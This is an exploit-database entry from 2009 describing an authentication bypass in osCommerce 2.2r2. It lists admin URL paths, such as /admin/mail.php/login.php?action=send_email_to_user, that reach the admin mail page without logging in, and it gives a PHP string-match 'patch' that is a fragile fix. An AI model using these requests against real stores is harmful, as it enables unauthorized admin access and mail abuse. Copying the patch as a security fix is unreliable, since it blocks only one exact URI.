OS Commerce 2.2r2 authentication bypass

2009-11-13T00:00:00
ID 1337DAY-ID-9982
Type zdt
Reporter Stuart Udall
Modified 2009-11-13T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================
OS Commerce 2.2r2 authentication bypass
=======================================

When this hole was brought to our attention, we were amazed to find that it seems nobody has caught it yet!! There is a page in the admin that can be access without login AND can pass parameters!!
 
/admin/mail.php/login.php
/admin/mail.php/login.php?fooled
/admin/mail.php/login.php?action=send_email_to_user
 
All work!
 
We "patched" this hole by adding this line of code:
 
if(strstr($_SERVER['REQUEST_URI'], "/admin/mail.php/login.php" ) !== false){
        echo "<h1>NO ACCESS</h1>";
        exit;
}
 


#  0day.today [2017-12-31]  #